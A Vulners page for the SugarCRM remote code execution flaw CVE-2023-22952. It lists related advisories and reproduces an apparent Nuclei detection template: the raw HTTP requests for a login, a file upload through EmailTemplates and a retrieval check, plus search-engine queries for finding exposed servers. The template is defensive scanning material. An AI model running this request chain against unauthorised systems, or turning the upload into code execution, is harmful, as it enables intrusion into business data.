| Reporter | Title | Published | Views | Family All 27 |
|---|---|---|---|---|
| SugarCRM 12.x Remote Code Execution / Shell Upload Exploit | 10 Mar 202300:00 | – | zdt | |
| CVE-2023-22952 | 11 Jan 202300:00 | – | attackerkb | |
| I have finalized the list of trending vulnerabilities for 2024 according to Positive Technologies | 20 Jan 202515:02 | – | avleonov | |
| The vulnerability of the template mechanism in the SugarCRM system allows a perpetrator to execute arbitrary code. | 5 Jan 202400:00 | – | bdu_fstec | |
| CVE-2023-22952 | 3 Feb 202306:39 | – | circl | |
| Multiple SugarCRM Products Remote Code Execution Vulnerability | 2 Feb 202300:00 | – | cisa_kev | |
| SugarCRM 输入验证错误漏洞 | 11 Jan 202300:00 | – | cnnvd | |
| CVE-2023-22952 | 11 Jan 202300:00 | – | cve | |
| CVE-2023-22952 | 11 Jan 202300:00 | – | cvelist | |
| SugarCRM unauthenticated Remote Code Execution (RCE) | 9 Mar 202319:53 | – | metasploit |
| Source | Link |
|---|---|
| attackerkb | www.attackerkb.com/topics/E486ui94II/cve-2023-22952 |
id: CVE-2023-22952
info:
name: SugarCRM Unauthenticated - Remote Code Execution
author: iamnoooob,rootxharsh,pdresearch
severity: high
description: |
In SugarCRM before 12.0. Hotfix 91155, a crafted request can inject custom PHP code through the EmailTemplates because of missing input validation.
impact: |
Authenticated attackers can inject custom PHP code through EmailTemplates to execute arbitrary commands on the SugarCRM server, potentially compromising customer relationship data and business intelligence information.
remediation: |
Update SugarCRM to version 12.0 Hotfix 91155 or later that implements proper input validation for EmailTemplates.
reference:
- https://attackerkb.com/topics/E486ui94II/cve-2023-22952
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2023-22952
cwe-id: CWE-20,CWE-94
epss-score: 0.80274
epss-percentile: 0.9957
cpe: cpe:2.3:a:sugarcrm:sugarcrm:*:*:*:*:*:*:*:*
metadata:
vendor: sugarcrm
product: sugarcrm
shodan-query:
- http.html:"sugarcrm inc. all rights reserved"
- http.title:"sugar setup wizard"
- http.title:"sugarcrm"
fofa-query:
- body="sugarcrm inc. all rights reserved"
- title="sugar setup wizard"
- title=sugarcrm
google-query:
- intext:"sugarcrm inc. all rights reserved"
- intitle:"sugar setup wizard"
- intitle:sugarcrm
tags: cve,cve2023,sugarcrm,rce,file-upload,intrusive,kev,vkev,vuln
flow: http(1) && http(2) && http(3)
http:
- raw:
- |
POST /index.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
module=Users&action=Authenticate&user_name=brenda&user_password=DbLiL98a
matchers:
- type: word
part: body
internal: true
words:
- 'You must specify a valid username and password'
- raw:
- |-
POST /index.php HTTP/1.1
Host: {{Hostname}}
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_2_1) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.2 Safari/605.1.15
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWeTJtA8WByYIQMGR
Connection: close
------WebKitFormBoundaryWeTJtA8WByYIQMGR
Content-Disposition: form-data; name="action"
AttachFiles
------WebKitFormBoundaryWeTJtA8WByYIQMGR
Content-Disposition: form-data; name="module"
EmailTemplates
------WebKitFormBoundaryWeTJtA8WByYIQMGR
Content-Disposition: form-data; name="file"; filename="{{randstr}}.txt"
Content-Type: image/png
{{ base64_decode('iVBORw0KGgoAAAANSUhEUgAAAAUAAAAUBAMAAAC3y+roAAAAD1BMVEVDVkUtMjAyMy0yMjk1MiA7qbPWAAAACXBIWXMAAA7EAAAOxAGVKw4bAAAAEUlEQVQImWNgAAJGZQcGKgEAHPkAZVUOitsAAAAASUVORK5CYII=')}}
------WebKitFormBoundaryWeTJtA8WByYIQMGR--
matchers:
- type: word
part: body
internal: true
words:
- '["cache\/images\/{{randstr}}.txt"]'
- raw:
- |
GET /cache/images/{{randstr}}.txt HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "CVE-2023-22952"
- type: word
part: header
words:
- "text/plain"
# digest: 4b0a0048304602210086415d1a3e69e38bee33fb401fdda1ab9027e4d20630c7901745484b3f9aa3ac022100b9f1e79428bcd0fe2bd24dbf249df396825f1f4dfae0276d75e22cbeb16d5552:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation